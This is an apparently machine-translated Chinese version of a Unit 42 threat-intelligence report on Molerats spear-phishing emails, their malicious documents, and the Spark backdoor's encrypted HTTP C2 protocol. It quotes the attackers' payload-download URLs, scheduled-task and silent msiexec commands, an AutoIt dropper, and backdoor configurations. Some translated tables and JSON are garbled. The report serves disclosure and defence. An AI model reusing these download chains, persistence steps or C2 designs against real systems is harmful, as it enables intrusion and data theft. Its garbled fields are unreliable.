x-sec
执行摘要
从2019年10月到2019年12月开始,第42单元观察到了多次网络钓鱼攻击实例,这些攻击可能与称为Molerats的威胁组织(又名Galer Hackers Team和Gaza Cybergang)有关,针对六个政府在六个国家的八个组织,电信,保险和零售业,其中后两者非常独特。保险和零售组织的目标是特殊的,因为它不适合此威胁组先前的目标集。在攻击这些看似非典型目标时使用的电子邮件主题和附件文件名称与攻击政府组织时使用的主题类似。
所有这些攻击都涉及鱼叉式网络钓鱼电子邮件,以传递恶意文档,这些恶意文档要求收件人执行某些操作。社会工程技术包括引诱图像,试图诱骗用户使内容能够运行宏,甚至是文档内容,这些内容有可能向媒体发布损害性图片,以迫使用户单击链接以下载恶意负载。大多数此类攻击中的有效负载是一个称为Spark的后门,该后门可让威胁参与者在受感染的系统上打开应用程序并运行命令行命令。
至少从2017年起,Molerats就使用了Spark后门,并且与加沙网络帮派的`` 行动议会''运动有关联。在一种攻击中提供的有效负载似乎与JhoneRAT有关,这可能表明威胁组已在其工具集中添加了另一个自定义有效负载。
Molerats早在2011年就针对全球政府组织投入运作,主要与涉及未经授权访问和敏感数据收集的攻击有关。人们观察到它们使用了一系列策略和技术,包括利用可公开获得的后门工具, (例如PoisonIvy或XtremeRAT)创建定制开发的产品(例如KASPERAGENT和MICROPSIA)。在我们跟踪的活动中,该小组主要依靠社会工程学和鱼叉式网络钓鱼技术作为其初始感染媒介,然后依靠多级命令与控制(C2)服务器来分发恶意软件。
Molerats使用多种技术使检测和分析变得困难,例如用密码保护交付文件,将Spark有效负载的执行限制为只能在具有阿拉伯语键盘和语言环境的系统上运行以及使用商业打包程序Enigma来混淆有效载荷。Spark C2通道还尝试逃避检测,因为HTTP POST请求和响应中的数据使用3DES或AES加密,并具有随机生成的密钥,这些密钥对于每个有效负载而言都是唯一的。
初始点
在2019年11月,第42单位被告知一封针对沙特阿拉伯政府组织的网络钓鱼电子邮件。此攻击涉及受密码保护的Microsoft Word文档,其中包含嵌入式宏。该文档的密码已通过电子邮件正文提供给受害者。从这次攻击中发现的工件中,我们能够使用我们的AutoFocus产品来进行其他攻击,并发现Molerats证明是攻击活动。
使用我们的AutoFocus工具,我们可以发现从2019年10月2日至2019年12月9日,行动者发送的几种攻击。这些电子邮件已发送到政府和电信行业的组织,并且混合了特定和通用的电子邮件主题和附件文件名。我们还看到了与这次攻击活动有关的会议,涉及两个美国组织,一个在零售业,另一个在保险业。
这些电子邮件附带的文件都是文档,大多数是Word文档和一个PDF文档。表1显示了此攻击活动中使用的电子邮件的列表,包括电子邮件的详细信息以及目标组织的国家和行业。在此博客中,我们将分析表1中列出的七个交付文件中的三个,因为文件名中带有MOFA的四个唯一的交付文件彼此非常相似。最后的交付文件('Urgent.docx')是Cisco Talos对一种名为JhoneRAT的新有效负载的研究中讨论的交付文件,这可能表明该组织在该地区的攻击活动中也使用了JhoneRAT。
| 日期 | 学科 | 附件 | SHA256 | 国家 | 行业 |
| 10/2/2019 | MOFA报告03-10-2019 | MOFA-031019.doc | d19104ef4f443e8 .. | 自动曝光 | 政府 |
| 10/3/2019 | 03-10-2019 | MOFA-031019.doc | d19104ef4f443e8 .. | 英国,ES | 政府 |
| 10/5/2019 | 06-10-2019 | MOFA- 061019.doc | 03be1d7e1071b01 .. | 自动曝光 | 政府 |
| 10/10/2019 | MOFA报告 | MOFA- 101019.doc | 011ba7f9b4c508f ..ddf938508618ff7 .. | 我们 | 保险,零售 |
| 10/31/2019 | لعنايةمعاليكم–المرفق2019年10月31日 | 附件.doc | eaf2ba0d78c0fda .. | DJ | 电讯 |
| 11/2/2019 | لعنايةمعاليكم–المرفق2019年10月31日 | 附件.doc | eaf2ba0d78c0fda .. | DJ | 电讯 |
| 11/18/2019 | صورك<已编辑>معهبة | 图片.pdf | 9d6ce7c585609b8 .. | ES | 政府 |
| 11/24/2019 | مخططالجهادالاسلاميلمباغتةاسرائيلوضربالتهدئة | 紧急文件 | 273aa20c4857d98 .. | DJ | 电讯 |
| 12/9/2019 | محضراجتماعقيادةالمخابراتالعامةمعوفدحركةحماس2019年9月12日 | 紧急文件 | 273aa20c4857d98 .. | DJ | 电讯 |
表1.在此攻击活动中看到的鱼叉式网络钓鱼电子邮件的详细信息
MOFA交货凭证
我们收集并分析的第一个文档的文件名为MOFA-061019.doc(SHA256:03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506)。本文档使用密码Abdullah @ 2019进行了密码保护。在打开并提供密码时,向受害者显示了内容,其中包括看起来缺少的图像,如图1所示。
一旦受害者随后启用了文档中的嵌入式宏,该宏就会对嵌入式VBScript(T1064)进行解码,并将其保存到C:\ programdata \ Micorsoft \ Microsoft.vbs中。Microsoft.vbs脚本将与C2域servicebios [。] com取得联系,以检索第二个VBScript,其中包含其他指令,然后可以检索有效负载。该脚本从以下URL下载此辅助VBScript并将其保存到C:\ ProgramData \ PlayerVLC.vbs:
https:// servicebios [。] com / PlayerVLC.vbs
然后,初始的VBScript将创建一个计划任务(T1053),以通过运行以下命令每分钟持续运行辅助VBScript:
schtasks / create / sc分钟/ mo 1 / tn PlayerVLC / F / tr C:\ ProgramData \ PlayerVLC.vbs
辅助VBScript尝试从以下URL下载可执行负载,并将其保存到C:\ ProgramData \ PlayerVLC.msi。
https:// servicebios [。] com / PlayerVLC.msi
下载可执行有效负载后,辅助VBScript在命令行(T1059)上运行以下命令以杀死任何现有的msiexec.exe进程实例,并使用ping应用程序休眠两秒钟,然后再使用合法的msiexec.exe应用程序(T1218)启动下载的PlayerVLC.msi文件:
%comspec%/ c taskkill / F / IM msiexec.exe和ping 127.0.0.1 -n 2> NUL和msiexec / i C:\ ProgramData \ PlayerVLC.msi / quiet / qn / norestart
不幸的是,我们无法获取PlayerVLC.msi文件,因为该文件不再由C2服务器托管。这凸显了模块化有效负载的好处,该有效负载要求与C2服务器进行成功通信链以成功感染,因为这使入侵后分析变得困难。这种类型的模块化有效负载和链接的C2请求是相当普遍的,正如我们已经看到,诸如DarkHydrus和Sofacy之类的各种对手正在使用它。这种行为可以帮助对手逃避自动防御,因为他们可以在攻击时部署其基础结构,并避免拥有其他工件来进行进一步分析。
附件交付文件
在2019年10月31日和11月2日交付的Word文档(SHA256:eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000)的文件名,并试图诱骗收件人单击“启用内容”按钮来运行嵌入式宏。图2显示了试图诱骗接收者单击“启用内容”按钮的诱饵图像。这些文档不受密码保护,这与之前讨论的MOFA交付文档不同。
宏非常简单,因为它尝试从以下Google Drive URL下载base64编码的可执行文件,该文件将解码并保存到%TEMP%\ rundll64.exe :
hxxps://drive.google [。] com / uc?export = download&id = 1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH
解码的可执行文件(SHA256:7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128P)是已编译的AutoIt脚本,该脚本将嵌入式可执行文件安装到%userprofile%\ runawy.exe并运行它。在退出之前,AutoIt脚本还通过将可执行文件复制到启动目录并通过运行以下命令来创建计划任务来确保该可执行文件能够持久运行:
SCHTASKS /创建/ f / SC分钟/ TN“ runawy” / mo 5 / tr“%userprofile%\ runawy.exe”
runawy.exe文件(SHA256:64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431)是一个有效载荷,其中包含Enigma,可创建“ S4.4P”互斥量。该有效载荷是Spark后门的打包变体,已专门链接到Molerats。在本博客的后面,我们将详细讨论Spark后门的功能,但是此特定示例具有以下配置:
{“ sIt”:“ nysura [。] com”,“ QrU”:“ /”,“ JJDF”:80,“ MJOu”:0,“ TuS”:“”,“ pJhC”:1,“ Lm”: ” NMRm3AlaGUeT2g9iA2lNTIk04vSj8r2IBUDEvItgOxw =”,“ LPO”:10000}
图片PDF交付文件
与前面讨论的两个Word文档不同,我们观察到了一个名为“ Pictures.pdf”的PDF文档(SHA256:9d6ce7c585609b8b23703617617ef9d480c1cfe0f3bf6f57e178773823b8bf86495)附加在一封电子邮件中,主题为阿拉伯语“ acted”,其中“ our”是由“赫巴”。PDF文档不会尝试利用漏洞,而是包含一条消息,该消息旨在迫使收件人单击链接以安装actor的有效负载。此外,与Word传递文档中使用精美的诱饵图像和缺少内容来试图诱使用户启用宏不同,该PDF文档使用了一种更为粗俗的方法,其中包含勒索信息,试图诱使用户单击。链接,打开RAR存档并运行可执行文件。
PDF文档中的消息是阿拉伯语,表明发件人对收件人的照片有妥协,他们会将这些照片发布到媒体上。该消息还暗示该文件已发送给政府官员的同事,并旨在威胁受害者单击文件中的链接。图3显示了PDF文档中的内容。
该文档中的链接为阿拉伯语,大致翻译为“ 您用Heba拍摄的肮脏图片的一小部分”和“图片 ”。链接指向以下URL,该URL区分大小写:
hxxps:// zmartco [。] com / Pictures.rar
该“Pictures.rar”文件(SHA256:1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da)是包含与هذهعينةقليلةمنالصورEXE的文件名一个文件中的RAR压缩文件。(SHA256:92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7),这大致翻译成“这是几样photos.exe ”。可执行文件是经过编译的AutoIt脚本,可提取嵌入式可执行文件并将其保存到C:\ Users \ Public \ pdf.exe(SHA256: 5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3)并在“ 开始”菜单\程序\启动\ l中自动创建快捷方式。每次系统启动时启动它,如下所示:
| 123456 | #NoTrayIconFileInstall("pdf.exe", "C:\Users\Public\" & "/pdf.exe")$cmd1 = "C:\Users\Public\" & "\pdf.exe"RunWait(@ComSpec & " /c start " & $cmd1, "", @SW_HIDE)FileCreateShortcut("C:\Users\Public\" & "\pdf.exe", @StartupDir & "\pdf.lnk") |
就像附件.doc Word文档提供的“ runawy.exe ”有效负载一样,保存到系统中的“ pdf.exe”文件是Spark后门的打包变体。后门的此变体具有以下配置:
{“ xBql”:“ laceibagrafica [。] com”,“ eauy”:“ /”,“ Qnd”:80,“ jJN”:0,“ rlOa”:“”,“ Eb”:1,“ BGa”: ” vcJbq6nzgJk =”,“ qJk”:10000}
交付基础架构
通常,在调查此类攻击时,可以轻松地找到用于不同活动的基础结构之间的链接,例如通过跟踪重用的IP地址或域,查找共享相似属性的相关域等。对于表1中列出的所有与MOFA相关的交付文档,servicebios [.com]是唯一使用的域,并且大多数基础结构信息都与历史用法有关。
借助AutoFocus威胁情报服务,我们在分析所述恶意文档时使用了从我们的云沙箱WildFire提供的备用数据点,以便进行数据透视和发现其他示例及相关基础结构。在本节中,我们将讨论我们使用的方法并描述其他基础结构。
下面的图4是一个maltego图表,该图表的下半部分显示了与servicebios [。] com域相关的Word文档和Visual Basic Script(vbs)文件,其中一些相关实体通过两个链接之一连接到图表上半部分的其他实体。所述链接在蓝色框中包括Yara签名,在橙色框中包括AutoFocus查询,如AutoFocus的“ AF”所示。
AutoFocus查询与导致Windows脚本宿主进程(wscript.exe)启动恶意VBS下载程序脚本的特定进程执行链相关。这使我们能够重点关注“ MOFA- 101019.doc”(SHA256:ddf938508618ffff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8)文档中的行为伪像,再到以前未知的文档“التقريراليوميحولأسمسالسلالسلالسلالمسل-9”巴勒斯坦重要发展,9-9-2019.doc; SHA256:feec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21)和“التقريراليوميحولأخرمستجداتالإريai – 9 9 –更新于9 – doc – 9上的最新消息。 doc; SHA256:bf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959)。
与原始Word文档一样,新文档中的VBA宏代码也使用Motobit的开源代码“ Base64解码VBS功能” 在运行之前将下载功能和URL 解码(T1027)到VBS。VBS文件之间的主要区别在于域– dapoerwedding [。] com –托管辅助VBS有效负载的域。在进行此活动时,该域解析为45.15.168 [。] 118,并已在2019年9月开始的上一个活动中使用。
在使用行为通用性搜索相关文件的同时,我们为与原始交付文档关联的VBS代码编写了Yara签名,以扫描我们和VirusTotal的语料库。这导致了两个附加的VBS文件:SHA256:85631021d7e84dc466b23cf77dd949ebc61011a52c1f0fb046cfd62dd9192a15代表第一阶段VBS下载程序,其中包含对所使用的域和文件名的细微更改,如下所示:
https:// dapoerwedding [。] com / GoogleChrome.vbs
发现的第二个VBS文件(SHA256:9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7)是第二级VBS下载程序,它参考了最终的MSI文件有效负载,在撰写本文时尚不可用:
https:// dapoerwedding [。] com / GoogleChrome.msi
我们还能够使用其他AutoFocus查询发现其他Word文档,如上面图X中的两个其他AutoFocus“ AF”橙色框所突出显示的。这些maltego实体查询使用来自原始文档的VBA宏代码计算散列专有我们的数据,并导致SHA256:602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb(servicebios COM []) ,并SHA256s:a2c68da1b3e0115f5804a55768b2baf50faea81f13a16e563411754dc6c0a8ff和([] dapoerwedding COM 4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba)。
在对dapoerwedding [。] com和servicebios [。] com进行初步检查时,没有发现与以前记录的Molerats活动有关联的事物,但是两个域之间存在一些共性(T1347):
另一个交付域– zmartco [。] com –具有上面列出的相同之处,与上一节中讨论的表1中列出的“ Pictures.pdf”交付附件有关。
与议会行动有关的火花有效载荷
由编译的AutoIt脚本安装的可执行文件是Molerats在许多攻击活动中使用的后门。直到最近,该后门还没有自己的绰号,但是Cybereason最近将其命名为“ Spark”。正如Cybereason博客中提到的那样,如Qi hoo 360 发表的博客中所述,Spark后门还于2019年1月发生的攻击中交付。根据我们的研究,至少从2017年初开始,Molerats就使用了Spark后门,它是卡巴斯基报道的“国会行动”运动的主要内容。
Spark使用HTTP POST请求与其C2服务器通信以接收命令并提取结果,所有这些都使用JSON结构的消息。在大多数情况下,威胁行动者会使用商业包装商来混淆Spark负载,以避免被发现。在我们的研究中,我们已经看到演员使用了Enigma保护器,Themida和VMProtect,这使得识别样本变得困难。我们还能够识别开发人员在二进制文件中留下的两个不同版本的基于Spark的标识符,分别是2.2版和4.2版。根据带有带有可识别版本字符串的Spark示例的文件的编译时间,似乎版本2.2是在2017年创建的,而版本4.2是在2019年12月下旬和2020年1月创建的。表2显示了这些包含版本号的Spark示例,
| 截断的SHA256 | 版 | 已编译 | 封隔器 |
| 966ad6452793b15 .. | 2.2 | 2017-05-24 6:15:04 | VMProtect |
| ab4e43b4e526d44 .. | 2.2 | 2017-05-24 6:15:04 | VMProtect |
| 212aa6e3f236550 .. | 2.2 | 2017-05-24 6:15:04 | VMProtect |
| cf32479ed30ae95 .. | 4.2 | 2019-12-30 9:45:44 | 没有 |
| d0dc1de0ae912c7 .. | 4.2 | 2020-01-12 10:57:50 | 谜 |
| 04fa6aaea5e3a26 .. | 4.2 | 2020-01-12 10:57:50 | 谜 |
| 6e60f5c65299ee7 .. | 4.2 | 2020-01-12 10:57:50 | 谜 |
| b08b8fddb9dd940 .. | 4.2 | 2020-01-12 10:57:50 | 谜 |
| 64ea1f1e0352f3d .. | 4.2 | 2020-01-12 10:57:50 | 谜 |
表2. Spark样本及其版本号,编译时间和使用的打包程序
我们已经收集了数十个Spark负载,其编译时间从2017年3月到2020年1月,这进一步表明该团队已经在攻击活动中使用了该后门程序近三年了。我们从每个文件中提取了配置,以收集与Spark相关的已知C2域,我们将其包含在表3中。
| 域 | 第一次使用 |
| webtutorialz [。] com | 2020年上半年 |
| nysura [。] com | 2020年上半年 |
| laceibagrafica [。] com | 2019年下半年 |
| motoqu [。] com | 2019年下半年 |
| smartweb9 [。] com | 2019年上半年 |
| laptower [。] com | 2018年下半年 |
| app.msexchanges16 [。] com | 2018年下半年 |
| msexchange13 [。] com | 2018年下半年 |
| cloudserviceapi [。]在线 | 2018年下半年 |
| updates.masterservices [。]在线 | 2018年下半年 |
| client.itresolver [。]在线 | 2018年上半年 |
| update.itresolver [。]在线 | 2018年上半年 |
| 91.219.237 [。] 99 | 2017年下半年 |
| goldenlines [。]网站 | 2017年下半年 |
| update.nextdata [。]网站 | 2017年下半年 |
表3. Spark C2域及其使用的大概时间
在下一部分中,我们将解释Spark的功能并演示我们的C2通道,该通道是根据我们对Pictures.pdf文档在2019年11月攻击中提供的“ pdf.exe”有效负载的分析确定的。
Pictures.pdf中的Spark有效负载2019年11月攻击
由编译的AutoIt脚本安装的Spark负载与商业Enigma保护器(T1045)打包在一起。当打包有效载荷时,参与者在Enigma保护器中使用了一个称为“飞溅屏幕”的功能,该角色被配置为在所有窗口顶部显示图像,并等待用户单击该图像,然后再执行恶意代码。图5显示了Enigma保护程序在执行恶意有效负载之前显示的启动图像,该图像是可在wallpaperwide.com上获得的壁纸图像。闪屏功能可作为逃避沙箱的技术,因为它要求用户在恶意代码运行之前以单击屏幕的形式进行交互。
从功能的角度看,一旦解压缩,Spark的有效载荷就类似于在国会行动中交付的有效载荷。Spark有效负载是一个后门,它允许威胁参与者在受感染的系统上打开应用程序并运行命令行命令。
有效负载首先检查GetKeyboardLayoutList的结果以及GetLocaleInfoA返回的语言名称,以确保它们包含单词“ arabic”。如果在这两个API调用的结果中未找到该单词,则有效负载将不执行其任何恶意代码。检查特定的键盘和语言是一种已知的规避策略,旨在避免在未配置的分析系统上运行,因为将配置参与者的目标受害者。
有效负载确认系统已安装了适合演员所需目标的键盘和语言包后,它将开始尝试与有效负载中嵌入的配置中指定的C2服务器进行通信。嵌入式配置被加密,有效负载通过首先使用自定义滚动XOR算法解密密钥和密文缓冲区来对其进行解密,从而导致密钥和密文看起来以base64编码。然后,它将生成base64编码密钥的SHA256哈希,并使用所得哈希的第四至第28个字节作为最终密钥。有效负载将对64位密文进行base64解码,并使用最终密钥使用Triple DES(3DES)解密解码后的密文,从而得到以JSON结构化的配置。
| JSON栏位 | JSON值 | 描述 |
| xBql | laceibagrafica [。] com | C2服务器的主机名 |
| 美女 | / | C2服务器的URI |
| nd | 80 | C2服务器的TCP端口 |
| J | 0 | 进入主C2通信回路之前的睡眠间隔。 |
| O | <空字符串> | 未知,似乎未使用。 |
| b | 1个 | 用途未知,但已发送至BrandentlK字段中的C2 |
| 硼镓 | vcJbq6nzgJk = | 硬编码的base64加密字符串,它是很可能用作广告系列标识符的“昵称”字段 |
| J | 10000 | 退出应用程序之前,C2主通信循环的迭代次数。 |
表3.有效负载配置中的JSON键/值对
有效负载还使用同一例程来解密包含睡眠间隔的加密缓冲区,更重要的是,该缓冲区包含用于构造往返于C2服务器的消息的名字的列表,以及用于解密这些消息的密钥。有效负载将使用表4中列出的名字作为发送到C2和从C2接收的消息中的JSON密钥名称和值。我们在附录中提供了此解密缓冲区的每个元素的描述,并且还将在本博客的后面部分中展示如何在C2通信中使用表4中的名称。表4中的每个值对于每个Spark示例都是唯一的,因为开发人员会更改每个有效负载的名称和键。
| 劳伦斯 | 阿拉尼 | 内娃 | 驻军 | ReeceWNM |
| 艾里尔 | Averizt | 伦敦 | 策克 | 摩根 |
| 杰森 | 恩·马蒂亚斯 | 乔斯林克 | 里斯夫 | 温斯顿 |
| 象牙 | BrandentlK | 天使 | 弗雷德里克 | 杰西卡 |
| 乔纳斯 | 阿达林 | ZaydenlnL | 凯莉·徐 | VanessaFM |
| 统治力 | AdelineRD | 休斯顿 | 永远 | 约旦 |
| 杜鲁门 | 科林斯 | 马克西米利亚诺 | 卡丽 | 阿里亚纳 |
表4. Spark用作C2通信的JSON密钥/值对的名字
在与C2服务器通信之前,有效负载将解密另一个缓冲区,该缓冲区包含有效负载用于调试消息的字符串以及将用于收集系统信息的命令。表5显示了解密的字符串及其用途。
| 解密的字符串 | 描述 |
| 1个 | 用途未知,但已发送到Averizt字段中的C2 |
| 311OEVZihfReZStoFf4cfg == | 解码并解密为用于获取系统主机名的/ c主机名 |
| Z9Q1WVryAIzLVSxF1yWRwg == | 解码并解密到%COMSPEC%,以获取cmd.exe的位置以运行命令以收集系统信息 |
| P5K5He / 2wSGGsvrFPKYpwg4KjBLyTOpbsGJwm1DckoyGK8eXeNMZCQBfHzkYRSjJlGcw6Ckn41X0MY3zJcU65uMvxpABv / g + ttABRJsG7js = | 解码并解密到/ c wmic csproduct获取UUID | 更多+1 | cmd / q / v:on / c“ set / p。=&echo(!。!”用于获取系统的UUID |
| AykC + x26hhd5DfrB / yly9gXcFsIlVxO9 | 解码并解密为/ c echo%username%,用于获取已登录帐户的用户名 |
| 好 | 表示成功执行命令的通用消息 |
| 创建管道错误 | 如果有效载荷未能创建管道以获取命令结果,则将调试消息发送到C2 |
| 创建进程错误 | 如果为命令创建过程时有效负载失败,则将调试消息发送到C2 |
| 获取退出代码处理错误 | 如果在尝试为命令创建进程时调用GetExitCodeProcess以获取错误消息时有效负载失败,则将调试消息发送到C2 |
| 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&*()_ + | 未知,因为它似乎未在代码中使用 |
| 设置句柄信息错误 | 尝试将创建的进程的stdout设置为继承对象句柄时调用SetHandleInformation时,如果有效载荷失败,则将调试消息发送到C2 |
| 等待单个对象错误 | 如果在尝试为命令创建进程后调用WaitForSingleObject时有效负载失败,则将调试消息发送到C2 |
表5.有效负载用于与C2服务器通信的缓冲区中的JSON键/值对
Spark C2通讯
有效负载与其C2服务器laceibagrafica [。] com通信通过在数据部分中发出带有base64编码和加密消息的HTTP POST请求。我们之前没有看到有关此C2通道的任何解释,因此我们将概述有效负载和C2服务器之间的来回通信,以显示该有效负载如何使用表4中的名称。为进行此分析,我们创建了一个C2服务器与Spark负载进行交互以发出命令,因此本节中的所有HTTP响应均来自我们创建的C2服务器,而不是actor开发的C2软件。图6显示了从有效负载发送到其C2服务器的初始信标。但是,从有效负载到C2的所有出站请求在外观上看起来都是相似的,因为它们都使用HTTP POST请求到具有编码和加密消息的同一URL。
初始信标中的数据部分将解码并解密为JSON消息{“ CallieVK”:“ W10 =”,“ ReeceWNM”:“ Jessicay”}。JSON消息包含两个键/值对,分别具有键“ ReeceWNM”和“ CallieVK”,其值分别传输通信类型和数据。例如,“ ReeceWNM”键包含用于表示初始信标通信类型的名称“ Jessicay ”。有效负载将解密C2服务器的响应以寻找“ EverlyY ”字段,并在继续之前使用该值作为睡眠间隔。图7显示了从C2服务器到初始信标的响应,该响应的响应解密为{“ EverlyY”:0}。
收到EverlyY响应后,有效负载将通过使用“ cmd.exe”运行以下命令行命令来收集系统信息,特别是用户名,主机名和系统特定的UUID:
- wmic csproduct获取UUID | 更多+1 | cmd / q / v:on / c“设置/ p。=&echo(!。!”
- 主机名
- 回声%username%
有效负载将使用base64编码的密文以JSON格式将这些命令结果中的每一个以JSON格式存储在字段名称“ ZaydenlnL”中,并使用名字“ AngelxEv”表示数据类型,该数字是与上面列表中的结果相对应的数字其中1代表UUID,2代表主机名,3代表用户名。这三个JSON对象将添加到名称为“ Maximiliano”的JSON数组中,并发送到C2服务器。例如,负载将系统信息存储在JSON中,如下所示:
{“ Maximiliano”:[{“ AngelxEv”:1,“ Houstonod”:1,“ ZaydenlnL”:“ <UUID的base64编码密文>”},{“ AngelxEv”:3,“ Houstonod”:1,“ ZaydenlnL” :“ <用户名的base64编码密文>”},{“ AngelxEv”:2,“ Houstonod”:1,“ ZaydenlnL”:“ <主机名的base64编码密文>”}]}
有效负载将通过将已编码的系统信息JSON设置为“ CallieVK”值,并将“ ReeceWNM”值设置为通信类型“ JoslynKe”来创建出站通信JSON对象。生成的JSON将类似于以下内容:
{“ CallieVK”:“ <系统信息“ Maximiliano” JSON数组的base64编码密文>”,“ ReeceWNM”:“ JoslynKe”}
生成的JSON对象经过base64编码,加密并在HTTP POST数据内发送到C2服务器,如图8中的示例请求所示。
发送系统信息后,有效负载将期望在响应内从C2服务器接收命令。图9显示了对此请求的响应,其中包含有效负载将解析以执行命令的加密数据。
有效负载没有命令处理程序。相反,它将通过调用CreateProcessW API函数来处理C2响应中的JSON对象,以使应用程序打开和/或运行命令行命令。预期的JSON对象包含一个名为“ Jordanlzw”的数组,该数组具有一个或多个对象,这些对象将在“象牙”字段中具有任务标识符编号,在“ Alanih”字段中运行的应用程序名称,以及要传递的命令行参数到“ TrumanRd”字段中的应用程序。例如,图9中解密后的响应包含一个JSON对象,它将使用命令行参数“ / c whoami”指示有效负载运行“ c:\ windows \ system32 \ cmd.exe”,该参数有效地运行“ whoami”命令:
{“ Aryana”:0,“ Jordanlzw”:[{“象牙”:5,“乔纳斯”:true,“ Reginacy”:false,“ TrumanRd”:“ / NKg0zJdCDP1XlK9NJ4eJA ==”,“ Alanih”:“ i8KOnxchf86h8HFFA45M ,“ LondonzO”:true}]}
运行C2提供的命令后,有效负载将向C2服务器发送一条消息,我们认为该消息是通过向服务器发送特定的任务标识符来通知C2它已接收到该命令。有效负载将使用通信类型“ MorganE”通知C2,如以下JSON所示:
{“ CallieVK”:“ eyJKYXNlTiI6W3siTGF3cmVuY2UiOjV9XX0 =”,“ ReeceWNM”:“ MorganE”}
“ CallieVK”字段中的解码数据将包含一个名称为“ JaseN”的JSON数组,其中包含一个或多个对象,这些对象的字段名称为“ Lawrence”,其中包含收到的任务编号,例如{“ JaseN”:[ {“劳伦斯”:5}]}。该确认发送到C2服务器,如图10所示:
确认收到命令后,有效负载期望C2使用JSON对象进行响应,并且将“ Allier”字段设置为数字,例如{“ Allier”:7 }。我们不确定此传输的目的或有效负载如何使用此数字值,但图11显示了包含“ Allier”字段的base64编码密文。
收到“ Allier” JSON对象后,有效负载会将已执行命令的结果发送到C2服务器。有效负载将创建一个带有名为“ Zeke”的数组的JSON对象,该数组将包含JSON对象,这些对象具有一个用于存储命令结果的“ FrederickT”字段,一个用于表示任务标识符的“ ReesefP”字段以及一个“如果命令执行成功,“ KaileeXws”字段将存储一个布尔值。当C2发出的“ whoami”命令的结果为“ test-system \ <redacted>”时,生成的JSON如下所示:
{“ Zeke”:[{“ FrederickT”:“ 5yUu16Ae8WKt <redacted>”,“ KaileeXws”:true,“ ReesefP”:5}]}}
有效负载将对此数据进行base64编码,并在出站JSON对象中将“ CallieVK”字段设置为“ ReeceWNM”字段设置为“ Winston”通信类型,如下所示:
{“ CallieVK”:“ eyJaZWtlIjpbeyJGcmVkZXJpY2tUIjoiNXlVdTE2QWU4V0t0aX <rededed> 0iLCJLYWlsZWVYd3MiOnRydWUsIlJlZXNlZlAiWjV9Win0ston”,“,”
然后,有效负载将对该JSON对象进行加密,并将其发送到C2服务器,以提取发出的命令的结果。图12显示了HTTP POST请求,该请求包含加密的JSON对象,该对象包含“ Winston”通信类型。
发送初始命令的结果后,有效负载期望C2使用JSON对象进行答复,该JSON对象的“ Garrison ”字段设置为数字,例如“ {“ Garrison”:8} “。图13显示了C2服务器使用带有“ Garrison ”字段的JSON对象的密文进行响应。
到此结束C2的签入和初始命令执行部分。有效负载将进入一个循环,以连续发送HTTP请求,以获得其他命令,以便使用先前解释的相同JSON对象序列运行,此序列从“ JoslynKe ”通信类型发送给C2后开始。代替将系统信息发送到C2并解析命令的响应,此循环的每次迭代都将从通信类型“ VanessaFM”开始,如下所示:
{“CallieVK”:” eyJBZGVsaW5lUkQiOiJ2Y0picTZuemdKaz0iLCJBdmVyaXp0IjoiMSIsIkJyYW5kZW50bEsiOjEsIk1hdGhpYXNOYm8iOlt7IkFkYWx5bm5nUyI6MSwiQ29sbGluc1BNIjoiS1Q2TloyMVNGTVQ5WHFuZVM3MjJmZkVucG1FUFVZcDBqcDFFTXRaVEtyUmNNWkVFWG56QnZnPT0iLCJOZXZhZWgiOnRydWV9XX0 =”,” ReeceWNM”:” VanessaFM”}
在“数据CallieVK ”字段进行解码,以JSON对象具有多个字段,其中之一是所谓的“阵列MathiasNbo包含JSON对象用于发射的UUID的入侵的系统中的一个领域名为”“ CollinsPM ”,这在以前在“ JoslynKe ”通信类型的“ ZaydenlnL ”字段中传输到C2 。JSON对象还包含“ AdelineRD ” 字段,该字段包含以base64编码密文形式的昵称或广告系列标识符值。我们已经汇编了已知Spark负载的活动代码列表,这些代码已包含在附录中。生成的JSON对象将如下所示:
{“ AdelineRD”:“ vcJbq6nzgJk =”,“ Averizt”:“ 1”,“ BrandentlK”:1,“ MathiasNbo”:[{“ AdalynngS”:1,“ CollinsPM”:”” <在UUID中看到的base64编码密文ZaydenlnL field>”,“ Nevaeh”:true}]}
如图14所示,此JSON进行了加密和base64编码,然后发送给C2服务器。有效负载将在主循环的每次迭代中使用相同的JSON,并期望C2提供与之前讨论的相同的响应序列,其中包含“ Jordanlzw ”,“ Allier ”和“ Garrison ”字段可接收其他命令。
2019年和2020年运动的比较
在收集其他Spark样本的同时,我们找到了2019年活动的样本以及2020年1月在Spark活动中使用的较新样本。这些活动中使用的交付文件和Spark负载与我们在2019年10月和2019年11月攻击中观察到的交付文件不同。在较高级别上,2019年1月交付文档是独立的,因为其中嵌入了有效负载,而2019年10月,2019年11月和2020年1月交付文档则需要与远程服务器进行交互。2019年10月和2020年1月的文档有所不同,因为前者试图下载VBScript来从参与者控制的服务器下载有效负载,而2020年1月的文档试图从Google Drive加载远程模板,其宏试图从Google Drive下载有效负载。每个交付文件安装的已知Spark负载也有所不同,
